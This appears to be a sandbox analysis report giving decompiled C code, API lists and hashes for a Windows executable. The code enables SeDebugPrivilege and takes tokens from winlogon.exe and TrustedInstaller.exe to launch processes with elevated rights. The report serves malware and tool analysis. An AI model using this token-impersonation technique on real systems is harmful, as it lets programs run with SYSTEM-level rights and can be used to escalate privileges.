				intOrPtr _t181;
				int _t187;
				intOrPtr _t188;
				intOrPtr _t190;
				intOrPtr _t198;
				signed int _t205;
				signed int _t206;

				_t179 = __edx;
				_t158 = __ecx;
				_t206 = _t205 & 0xfffffff8;
				E0040B550(0x1ccc, __ecx);
				_t76 = E0040313D(_t158);
				if(_t76 != 0) {
					E0040AC52();
					SetErrorMode(0x8001); // executed
					_t156 = 0;
					 *0x40fa70 = 0x11223344;
					EnumResourceTypesW(GetModuleHandleW(0), E0040A3C1, 0); // executed
					_t82 = E00405497( &_a8);
					_a48 = 0x20;
					_a40 = 0;
					_a52 = 0;
					_a44 = 0;
					_a56 = 0;
					E004056B5(_t158, __eflags, _t82, _a12);
					E00408F48(_t158, __eflags, L"SeDebugPrivilege"); // executed
					 *_t206 = L"/SpecialRun";
					_t85 = E0040585C( &_v0);
					__eflags = _t85;
					if(_t85 != 0) {
						L8:
						_t86 = E0040585C( &_a8, L"/Run");
						__eflags = _t86 - _t156;
						if(_t86 < _t156) {
							_t87 = E0040585C( &_a8, L"/cfg");
							__eflags = _t87 - _t156;
							if(_t87 >= _t156) {
								_t162 =  *0x40fa74; // 0x4101c8
								_t41 = _t87 + 1; // 0x1
								ExpandEnvironmentStringsW(E0040584C( &_a8, _t41), _t162 + 0x5504, 0x104);
								_t115 =  *0x40fa74; // 0x4101c8
								_t117 = wcschr(_t115 + 0x5504, 0x5c);
								__eflags = _t117;
								if(_t117 == 0) {
									_a92 = _t156;
									memset( &_a94, _t156, 0x208);
									_a620 = _t156;
									memset( &_a622, _t156, 0x208);
									GetCurrentDirectoryW(0x104,  &_a92);
									_t124 =  *0x40fa74; // 0x4101c8
									_t125 = _t124 + 0x5504;
									_v4 = _t125;
									_t187 = wcslen(_t125);
									_t51 = wcslen( &_a92) + 1; // 0x1
									__eflags = _t187 + _t51 - 0x104;
									if(_t187 + _t51 >= 0x104) {
										_a620 = _t156;
									} else {
										E00404BE4( &_a620,  &_a92, _v4);
									}
									_t131 =  *0x40fa74; // 0x4101c8
									_t132 = _t131 + 0x5504;
									__eflags = _t132;
									wcscpy(_t132,  &_a620);
								}
							}
							E00402F31(_t156);
							_t181 =  *0x40fa74; // 0x4101c8
							_pop(_t159);
							_a84 =  &_a8;
							_a76 = 0x40cb0c;
							_a88 = _t156;
							_a80 = _t156;
							E0040177C( &_a76, _t181 + 0x10, __eflags, _t156);
							_t92 =  *0x40fa74; // 0x4101c8
							__eflags =  *((intOrPtr*)(_t92 + 0x5710)) - _t156;
							if( *((intOrPtr*)(_t92 + 0x5710)) == _t156) {
								_t93 = E0040585C( &_a8, L"/savelangfile");
								__eflags = _t93;
								if(_t93 < 0) {
									E00406420();
									__imp__CoInitialize(_t156);
									_t95 =  *0x40fa74; // 0x4101c8
									E00408910(_t95 + 0x10, _t159, 0x416f60);
									 *((intOrPtr*)( *0x4158e0 + 8))(_t156);
									_t198 =  *0x40fa74; // 0x4101c8
									E00408910(0x416f60, 0x4158e0, _t198 + 0x10);
									E00402F31(1);
									__imp__CoUninitialize();
								} else {
									E004065BE(_t159);
								}
								goto L7;
							} else {
								_t64 = _t92 + 0x10; // 0x4101d8
								_a7356 = _t156;
								_a7352 = _t156;
								_a7340 = _t156;
								_a7344 = _t156;
								_a7348 = _t156;
								_t156 = E00401D40(_t179, _t64,  &_a5292);
								_t110 =  &_a5288;
								L6:
								E004035FB(_t110);
								L7:
								E004054B9( &_v0);
								E004099D4( &_a32);
								E004054B9( &_v0);
								_t106 = _t156;
								goto L2;
							}
						}
						_t26 = _t86 + 1; // 0x1
						_t173 = _t26;
						__eflags =  *((intOrPtr*)(E0040584C( &_a8, _t26))) - _t156;
						if(__eflags == 0) {
							E00402F31(_t156);
						} else {
							E00402FC6(_t173, __eflags, _t138);
						}
						_t188 =  *0x40fa74; // 0x4101c8
						_a68 =  &_a8;
						_a60 = 0x40cb0c;
						_a72 = _t156;
						_a64 = _t156;
						E0040177C( &_a60, _t188 + 0x10, __eflags, _t156);
						_t190 =  *0x40fa74; // 0x4101c8
						_a5280 = _t156;
						_a5276 = _t156;
						_a5264 = _t156;
						_a5268 = _t156;
						_a5272 = _t156;
						_t156 = E00401D40(_t179, _t190 + 0x10,  &_a3216);
						_t110 =  &_a3212;
						goto L6;
					}
					__eflags = _a56 - 3;
					if(_a56 != 3) {
						goto L8;
					}
					__eflags = 1;
					_a3212 = 0;
					_a3208 = 0;
					_a3196 = 0;
					_a3200 = 0;
					_a3204 = 0;
					_v4 = 0;
					_v0 = 0;
					swscanf(E0040584C( &_v0, 1), L"%I64x",  &_v4);
					_t177 = 2;
					_push(E0040584C( &_v0, _t177));
					L0040B1F8();
					_pop(_t178);
					_t156 = E00401AC9(_t178, _t179, __eflags,  &_a1148, _v4, _v0, _t152);
					_t110 =  &_a1132;
					goto L6;
				} else {
					_t106 = _t76 + 1;
					L2:
					return _t106;
				}
			}




































                                                                                                                    0x00408533
                                                                                                                    0x00408533
                                                                                                                    0x00408536
                                                                                                                    0x0040853e
                                                                                                                    0x00408546
                                                                                                                    0x0040854d
                                                                                                                    0x00408559
                                                                                                                    0x00408563
                                                                                                                    0x00408569
                                                                                                                    0x00408572
                                                                                                                    0x00408583
                                                                                                                    0x0040858d
                                                                                                                    0x00408595
                                                                                                                    0x0040859e
                                                                                                                    0x004085a2
                                                                                                                    0x004085a6
                                                                                                                    0x004085aa
                                                                                                                    0x004085ae
                                                                                                                    0x004085b8
                                                                                                                    0x004085c1
                                                                                                                    0x004085c8
                                                                                                                    0x004085cd
                                                                                                                    0x004085cf
                                                                                                                    0x0040867f
                                                                                                                    0x00408688
                                                                                                                    0x0040868d
                                                                                                                    0x0040868f
                                                                                                                    0x00408730
                                                                                                                    0x00408735
                                                                                                                    0x00408737
                                                                                                                    0x0040873d
                                                                                                                    0x00408750
                                                                                                                    0x0040875d
                                                                                                                    0x00408763
                                                                                                                    0x00408770
                                                                                                                    0x00408775
                                                                                                                    0x00408779
                                                                                                                    0x0040878b
                                                                                                                    0x00408790
                                                                                                                    0x004087a2
                                                                                                                    0x004087aa
                                                                                                                    0x004087b8
                                                                                                                    0x004087be
                                                                                                                    0x004087c3
                                                                                                                    0x004087c9
                                                                                                                    0x004087d2
                                                                                                                    0x004087df
                                                                                                                    0x004087e3
                                                                                                                    0x004087e6
                                                                                                                    0x00408801
                                                                                                                    0x004087e8
                                                                                                                    0x004087f8
                                                                                                                    0x004087fe
                                                                                                                    0x00408811
                                                                                                                    0x00408816
                                                                                                                    0x00408816
                                                                                                                    0x0040881c
                                                                                                                    0x00408822
                                                                                                                    0x00408779
                                                                                                                    0x00408824
                                                                                                                    0x00408829
                                                                                                                    0x00408833
                                                                                                                    0x00408834
                                                                                                                    0x00408840
                                                                                                                    0x00408848
                                                                                                                    0x0040884c
                                                                                                                    0x00408850
                                                                                                                    0x00408855
                                                                                                                    0x0040885a
                                                                                                                    0x00408860
                                                                                                                    0x004088ac
                                                                                                                    0x004088b1
                                                                                                                    0x004088b3
                                                                                                                    0x004088bf
                                                                                                                    0x004088c5
                                                                                                                    0x004088cb
                                                                                                                    0x004088da
                                                                                                                    0x004088ea
                                                                                                                    0x004088ed
                                                                                                                    0x004088f8
                                                                                                                    0x004088ff
                                                                                                                    0x00408905
                                                                                                                    0x004088b5
                                                                                                                    0x004088b5
                                                                                                                    0x004088b5
                                                                                                                    0x00000000
                                                                                                                    0x00408862
                                                                                                                    0x00408862
                                                                                                                    0x0040886d
                                                                                                                    0x00408874
                                                                                                                    0x0040887b
                                                                                                                    0x00408882
                                                                                                                    0x00408889
                                                                                                                    0x00408895
                                                                                                                    0x00408897
                                                                                                                    0x00408658
                                                                                                                    0x00408658
                                                                                                                    0x0040865d
                                                                                                                    0x00408661
                                                                                                                    0x0040866a
                                                                                                                    0x00408673
                                                                                                                    0x00408678
                                                                                                                    0x00000000
                                                                                                                    0x00408678
                                                                                                                    0x00408860
                                                                                                                    0x00408695
                                                                                                                    0x00408695
                                                                                                                    0x0040869f
                                                                                                                    0x004086a2
                                                                                                                    0x004086af
                                                                                                                    0x004086a4
                                                                                                                    0x004086a7
                                                                                                                    0x004086a7
                                                                                                                    0x004086b4
                                                                                                                    0x004086bf
                                                                                                                    0x004086cb
                                                                                                                    0x004086d3
                                                                                                                    0x004086d7
                                                                                                                    0x004086db
                                                                                                                    0x004086e0
                                                                                                                    0x004086f1
                                                                                                                    0x004086f8
                                                                                                                    0x004086ff
                                                                                                                    0x00408706
                                                                                                                    0x0040870d
                                                                                                                    0x00408719
                                                                                                                    0x0040871b
                                                                                                                    0x00000000
                                                                                                                    0x0040871b
                                                                                                                    0x004085d5
                                                                                                                    0x004085da
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004085ec
                                                                                                                    0x004085ef
                                                                                                                    0x004085f6
                                                                                                                    0x004085fd
                                                                                                                    0x00408604
                                                                                                                    0x0040860b
                                                                                                                    0x00408612
                                                                                                                    0x00408616
                                                                                                                    0x00408620
                                                                                                                    0x0040862a
                                                                                                                    0x00408632
                                                                                                                    0x00408633
                                                                                                                    0x00408638
                                                                                                                    0x0040864f
                                                                                                                    0x00408651
                                                                                                                    0x00000000
                                                                                                                    0x0040854f
                                                                                                                    0x0040854f
                                                                                                                    0x00408550
                                                                                                                    0x00408556
                                                                                                                    0x00408556

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0040313D: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040315C
                                                                                                                      • Part of subcall function 0040313D: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 0040316E
                                                                                                                      • Part of subcall function 0040313D: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403182
                                                                                                                      • Part of subcall function 0040313D: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 004031AD
                                                                                                                    • SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00408563
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,0040A3C1,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040857C
                                                                                                                    • EnumResourceTypesW.KERNEL32 ref: 00408583
                                                                                                                    • swscanf.MSVCRT ref: 00408620
                                                                                                                    • _wtoi.MSVCRT ref: 00408633
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes_wtoiswscanf
                                                                                                                    • String ID: $%I64x$/Run$/cfg$/savelangfile$SeDebugPrivilege$`oA$XA
                                                                                                                    • API String ID: 3933224404-3784219877
                                                                                                                    • Opcode ID: 1ed12eb10884b9e827e0875f5387ef1e7972f3b4abe7ba30fea96de0eb1c323a
                                                                                                                    • Instruction ID: 6a1ad454fb11d14b300c4ed281ce3bcdfe782ea4983c0409628bf6e0aeb57f2c
                                                                                                                    • Opcode Fuzzy Hash: 1ed12eb10884b9e827e0875f5387ef1e7972f3b4abe7ba30fea96de0eb1c323a
                                                                                                                    • Instruction Fuzzy Hash: 7FA16F71508340DBD720EF65DD8599BB7E8FB88308F50493FF588A3292DB3899098F5A
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00401FE6, Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 243processCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 81%
                                                                                                                    			E00401FE6(void* __eax, void* __ecx, void* __edx, WCHAR* _a4, WCHAR* _a8, long _a12, void* _a16, WCHAR* _a20, struct _STARTUPINFOW* _a24, struct _PROCESS_INFORMATION* _a28) {
				int _v8;
				long _v12;
				wchar_t* _v16;
				void _v546;
				long _v548;
				void _v1074;
				char _v1076;
				void* __esi;
				long _t84;
				int _t87;
				wchar_t* _t88;
				int _t92;
				void* _t93;
				int _t94;
				int _t96;
				int _t99;
				int _t104;
				long _t105;
				int _t110;
				void** _t112;
				int _t113;
				intOrPtr _t131;
				wchar_t* _t132;
				int* _t148;
				wchar_t* _t149;
				int _t151;
				void* _t152;
				void* _t153;
				int _t154;
				void* _t155;
				long _t160;

				_t145 = __edx;
				_t152 = __ecx;
				_t131 =  *((intOrPtr*)(__eax + 0x44a8));
				_v12 = 0;
				if(_t131 != 4) {
					__eflags = _t131 - 5;
					if(_t131 != 5) {
						__eflags = _t131 - 9;
						if(__eflags != 0) {
							__eflags = _t131 - 8;
							if(_t131 != 8) {
								__eflags = _t131 - 6;
								if(_t131 != 6) {
									__eflags = _t131 - 7;
									if(_t131 != 7) {
										__eflags = CreateProcessW(_a4, _a8, 0, 0, 0, _a12, _a16, _a20, _a24, _a28);
									} else {
										_t132 = __eax + 0x46b6;
										_t148 = __eax + 0x48b6;
										__eflags =  *_t148;
										_v16 = _t132;
										_v8 = __eax + 0x4ab6;
										if( *_t148 == 0) {
											_t88 = wcschr(_t132, 0x40);
											__eflags = _t88;
											if(_t88 != 0) {
												_t148 = 0;
												__eflags = 0;
											}
										}
										_t153 = _t152 + 0x800;
										E0040289F(_t153);
										_t154 =  *(_t153 + 0xc);
										__eflags = _t154;
										if(_t154 == 0) {
											_t87 = 0;
											__eflags = 0;
										} else {
											_t87 =  *_t154(_v16, _t148, _v8, 1, _a4, _a8, _a12, _a16, _a20, _a24, _a28);
										}
										__eflags = _t87;
									}
									if(__eflags == 0) {
										_t84 = GetLastError();
										L43:
										_v12 = _t84;
									}
									goto L44;
								}
								__eflags = E00401D99(__eax + 0x44ac, __edx);
								if(__eflags == 0) {
									goto L44;
								}
								_t92 = E0040A46C(_t131, __eflags,  &_a28, _t90, _a4, _a8, _a12, _a20, _a24, _a28);
								__eflags = _t92;
								if(_t92 != 0) {
									goto L44;
								}
								_t84 = _a28;
								goto L43;
							}
							_t93 = OpenSCManagerW(0, L"ServicesActive", 0x35); // executed
							__eflags = _t93;
							if(_t93 != 0) {
								E00401306(_t93); // executed
							}
							_v8 = 0;
							_t94 = E00401F04(_t145, _t152); // executed
							__eflags = _t94;
							_v12 = _t94;
							if(__eflags == 0) {
								_t96 = E00401DF9(_t145, __eflags, _t152, L"TrustedInstaller.exe",  &_v8); // executed
								__eflags = _t96;
								_v12 = _t96;
								if(_t96 == 0) {
									_t99 = E004028ED(_t152 + 0x800, _v8, _a4, _a8, _a12, _a16, _a20, _a24, _a28);
									__eflags = _t99;
									if(_t99 == 0) {
										_v12 = GetLastError();
									}
									CloseHandle(_v8); // executed
								}
								RevertToSelf(); // executed
							}
							goto L44;
						}
						_t104 = E0040598B(__edx, __eflags, __eax + 0x46b6);
						__eflags = _t104;
						if(_t104 == 0) {
							goto L44;
						}
						_v8 = 0;
						_t105 = E00401E44(_t152, _t104,  &_v8);
						goto L14;
					}
					_t149 = __eax + 0x44ac;
					_t110 = wcslen(_t149);
					__eflags = _t110;
					if(_t110 <= 0) {
						goto L44;
					} else {
						_v8 = 0;
						__eflags = E00404EA9(_t149, _t110);
						_t112 =  &_v8;
						_push(_t112);
						_push(_t149);
						if(__eflags == 0) {
							_push(_t152);
							_t113 = E00401DF9(_t145, __eflags);
						} else {
							L0040B1F8();
							_push(_t112);
							_push(_t152);
							_t113 = E00401E44();
						}
						_v12 = _t113;
						__eflags = _t113;
						goto L15;
					}
				} else {
					_v548 = 0;
					memset( &_v546, 0, 0x208);
					_v1076 = 0;
					memset( &_v1074, 0, 0x208);
					E00404C3C( &_v548);
					 *((intOrPtr*)(_t155 + 0x18)) = L"winlogon.exe";
					_t151 = wcslen(??);
					_t10 = wcslen( &_v548) + 1; // 0x1
					_t159 = _t151 + _t10 - 0x104;
					if(_t151 + _t10 >= 0x104) {
						_v1076 = 0;
					} else {
						E00404BE4( &_v1076,  &_v548, L"winlogon.exe");
					}
					_v8 = 0;
					_t105 = E00401DF9(_t145, _t159, _t152,  &_v1076,  &_v8);
					L14:
					_t160 = _t105;
					_v12 = _t105;
					L15:
					if(_t160 == 0) {
						if(E004028ED(_t152 + 0x800, _v8, _a4, _a8, _a12, _a16, _a20, _a24, _a28) == 0) {
							_v12 = GetLastError();
						}
						CloseHandle(_v8);
					}
					L44:
					return _v12;
				}
			}


































                                                                                                                    0x00401fe6
                                                                                                                    0x00401ff1
                                                                                                                    0x00401ff3
                                                                                                                    0x00401fff
                                                                                                                    0x00402002
                                                                                                                    0x004020a8
                                                                                                                    0x004020ab
                                                                                                                    0x004020f3
                                                                                                                    0x004020f6
                                                                                                                    0x00402162
                                                                                                                    0x00402165
                                                                                                                    0x004021f2
                                                                                                                    0x004021f5
                                                                                                                    0x00402235
                                                                                                                    0x00402238
                                                                                                                    0x004022be
                                                                                                                    0x0040223a
                                                                                                                    0x0040223a
                                                                                                                    0x00402240
                                                                                                                    0x0040224b
                                                                                                                    0x0040224e
                                                                                                                    0x00402251
                                                                                                                    0x00402254
                                                                                                                    0x00402259
                                                                                                                    0x0040225e
                                                                                                                    0x00402262
                                                                                                                    0x00402264
                                                                                                                    0x00402264
                                                                                                                    0x00402264
                                                                                                                    0x00402262
                                                                                                                    0x00402266
                                                                                                                    0x0040226c
                                                                                                                    0x00402271
                                                                                                                    0x00402274
                                                                                                                    0x00402276
                                                                                                                    0x0040229a
                                                                                                                    0x0040229a
                                                                                                                    0x00402278
                                                                                                                    0x00402296
                                                                                                                    0x00402296
                                                                                                                    0x0040229c
                                                                                                                    0x0040229c
                                                                                                                    0x004022c0
                                                                                                                    0x004022c2
                                                                                                                    0x004022c8
                                                                                                                    0x004022c8
                                                                                                                    0x004022c8
                                                                                                                    0x00000000
                                                                                                                    0x004022c0
                                                                                                                    0x00402201
                                                                                                                    0x00402203
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00402220
                                                                                                                    0x00402225
                                                                                                                    0x00402227
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0040222d
                                                                                                                    0x00000000
                                                                                                                    0x0040222d
                                                                                                                    0x00402173
                                                                                                                    0x00402179
                                                                                                                    0x0040217b
                                                                                                                    0x0040217e
                                                                                                                    0x00402183
                                                                                                                    0x00402185
                                                                                                                    0x00402188
                                                                                                                    0x0040218d
                                                                                                                    0x0040218f
                                                                                                                    0x00402192
                                                                                                                    0x004021a2
                                                                                                                    0x004021a7
                                                                                                                    0x004021a9
                                                                                                                    0x004021ac
                                                                                                                    0x004021cc
                                                                                                                    0x004021d1
                                                                                                                    0x004021d3
                                                                                                                    0x004021db
                                                                                                                    0x004021db
                                                                                                                    0x004021e1
                                                                                                                    0x004021e1
                                                                                                                    0x004021e7
                                                                                                                    0x004021e7
                                                                                                                    0x00000000
                                                                                                                    0x00402192
                                                                                                                    0x004020fe
                                                                                                                    0x00402103
                                                                                                                    0x00402105
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00402111
                                                                                                                    0x00402114
                                                                                                                    0x00000000
                                                                                                                    0x00402114
                                                                                                                    0x004020ad
                                                                                                                    0x004020b4
                                                                                                                    0x004020b9
                                                                                                                    0x004020bc
                                                                                                                    0x00000000
                                                                                                                    0x004020c2
                                                                                                                    0x004020c4
                                                                                                                    0x004020ce
                                                                                                                    0x004020d0
                                                                                                                    0x004020d3
                                                                                                                    0x004020d4
                                                                                                                    0x004020d5
                                                                                                                    0x004020e6
                                                                                                                    0x004020e7
                                                                                                                    0x004020d7
                                                                                                                    0x004020d7
                                                                                                                    0x004020dd
                                                                                                                    0x004020de
                                                                                                                    0x004020df
                                                                                                                    0x004020df
                                                                                                                    0x004020ec
                                                                                                                    0x004020ef
                                                                                                                    0x00000000
                                                                                                                    0x004020ef
                                                                                                                    0x00402008
                                                                                                                    0x00402016
                                                                                                                    0x0040201d
                                                                                                                    0x0040202e
                                                                                                                    0x00402035
                                                                                                                    0x00402044
                                                                                                                    0x00402049
                                                                                                                    0x00402055
                                                                                                                    0x00402064
                                                                                                                    0x00402068
                                                                                                                    0x0040206e
                                                                                                                    0x0040208b
                                                                                                                    0x00402070
                                                                                                                    0x00402082
                                                                                                                    0x00402088
                                                                                                                    0x0040209e
                                                                                                                    0x004020a1
                                                                                                                    0x00402119
                                                                                                                    0x00402119
                                                                                                                    0x0040211b
                                                                                                                    0x0040211e
                                                                                                                    0x0040211e
                                                                                                                    0x00402149
                                                                                                                    0x00402151
                                                                                                                    0x00402151
                                                                                                                    0x00402157
                                                                                                                    0x00402157
                                                                                                                    0x004022cb
                                                                                                                    0x004022d2
                                                                                                                    0x004022d2

                                                                                                                    APIs
                                                                                                                    • memset.MSVCRT ref: 0040201D
                                                                                                                    • memset.MSVCRT ref: 00402035
                                                                                                                      • Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
                                                                                                                      • Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62
                                                                                                                    • wcslen.MSVCRT ref: 00402050
                                                                                                                    • wcslen.MSVCRT ref: 0040205F
                                                                                                                    • wcslen.MSVCRT ref: 004020B4
                                                                                                                    • _wtoi.MSVCRT ref: 004020D7
                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 0040214B
                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 00402157
                                                                                                                    • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000035,?,?,00000000), ref: 00402173
                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,TrustedInstaller.exe,?,?), ref: 004021D5
                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,TrustedInstaller.exe,?,?), ref: 004021E1
                                                                                                                    • RevertToSelf.KERNELBASE(?,TrustedInstaller.exe,?,?), ref: 004021E7
                                                                                                                      • Part of subcall function 00404BE4: wcscpy.MSVCRT ref: 00404BEC
                                                                                                                      • Part of subcall function 00404BE4: wcscat.MSVCRT ref: 00404BFB
                                                                                                                      • Part of subcall function 0040598B: memset.MSVCRT ref: 004059B5
                                                                                                                      • Part of subcall function 0040598B: _wcsicmp.MSVCRT ref: 004059FA
                                                                                                                      • Part of subcall function 0040598B: wcschr.MSVCRT ref: 00405A0E
                                                                                                                      • Part of subcall function 0040598B: _wcsicmp.MSVCRT ref: 00405A20
                                                                                                                      • Part of subcall function 0040598B: OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00405A36
                                                                                                                      • Part of subcall function 0040598B: OpenProcessToken.ADVAPI32(00000000,00000002,?), ref: 00405A4C
                                                                                                                      • Part of subcall function 0040598B: CloseHandle.KERNEL32(?), ref: 00405A5A
                                                                                                                      • Part of subcall function 0040598B: CloseHandle.KERNEL32(00000000), ref: 00405A61
                                                                                                                      • Part of subcall function 00401E44: OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,winlogon.exe,?,00000000,winlogon.exe,00000000), ref: 00401E5C
                                                                                                                      • Part of subcall function 00401E44: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401ED8
                                                                                                                      • Part of subcall function 00401E44: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401EEB
                                                                                                                    • wcschr.MSVCRT ref: 00402259
                                                                                                                    • CreateProcessW.KERNEL32 ref: 004022B8
                                                                                                                    • GetLastError.KERNEL32(?,?,00000000), ref: 004022C2
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseHandle$OpenProcess$ErrorLastmemsetwcslen$_wcsicmpwcschrwcscpy$CreateDirectoryManagerRevertSelfSystemToken_wtoiwcscat
                                                                                                                    • String ID: ServicesActive$TrustedInstaller.exe$winlogon.exe
                                                                                                                    • API String ID: 3201562063-2355939583
                                                                                                                    • Opcode ID: 36f9f8526d762d4bf55260197473f7f83151b965ca01539aa69d60d29f45efaf
                                                                                                                    • Instruction ID: ccbcfbde9fdc9ff515b0a1e4c69409fc0ea490cdea51ab3e51e2115b03466e24
                                                                                                                    • Opcode Fuzzy Hash: 36f9f8526d762d4bf55260197473f7f83151b965ca01539aa69d60d29f45efaf
                                                                                                                    • Instruction Fuzzy Hash: 02813A76800209EACF11AFE0CD899AE7BA9FF08308F10457AFA05B21D1D7798A549B59
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00409921, Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 29libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00409921(struct HINSTANCE__** __esi) {
				void* _t6;
				struct HINSTANCE__* _t7;
				_Unknown_base(*)()* _t12;
				CHAR* _t13;
				intOrPtr* _t17;

				if( *__esi == 0) {
					_t7 = E00405436(L"psapi.dll"); // executed
					 *_t17 = "GetModuleBaseNameW";
					 *__esi = _t7;
					__esi[1] = GetProcAddress(_t7, _t13);
					__esi[2] = GetProcAddress( *__esi, "EnumProcessModules");
					__esi[4] = GetProcAddress( *__esi, "GetModuleFileNameExW");
					__esi[5] = GetProcAddress( *__esi, "EnumProcesses");
					_t12 = GetProcAddress( *__esi, "GetModuleInformation");
					__esi[3] = _t12;
					return _t12;
				}
				return _t6;
			}








                                                                                                                    0x00409924
                                                                                                                    0x0040992c
                                                                                                                    0x00409937
                                                                                                                    0x0040993f
                                                                                                                    0x0040994a
                                                                                                                    0x00409956
                                                                                                                    0x00409962
                                                                                                                    0x0040996e
                                                                                                                    0x00409971
                                                                                                                    0x00409973
                                                                                                                    0x00000000
                                                                                                                    0x00409976
                                                                                                                    0x00409977

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                                      • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                                      • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                      • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                    • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00409941
                                                                                                                    • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 0040994D
                                                                                                                    • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00409959
                                                                                                                    • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00409965
                                                                                                                    • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00409971
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$LibraryLoad$memsetwcscat
                                                                                                                    • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                    • API String ID: 1529661771-70141382
                                                                                                                    • Opcode ID: 5bb6ae9af13ee73b8e972736f9e45c56a416d8eed90bd4e1aed24245ad07e366
                                                                                                                    • Instruction ID: 092d130926b261125bd3b69643a6c94717898c68ce40be050c227dd31faca138
                                                                                                                    • Opcode Fuzzy Hash: 5bb6ae9af13ee73b8e972736f9e45c56a416d8eed90bd4e1aed24245ad07e366
                                                                                                                    • Instruction Fuzzy Hash: C7F0D4B4D40704AECB306FB59C09E16BAE1EFA8700B614D3EE0C1A3290D7799044CF48
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0040B2C6, Relevance: 18.1, APIs: 12, Instructions: 134COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
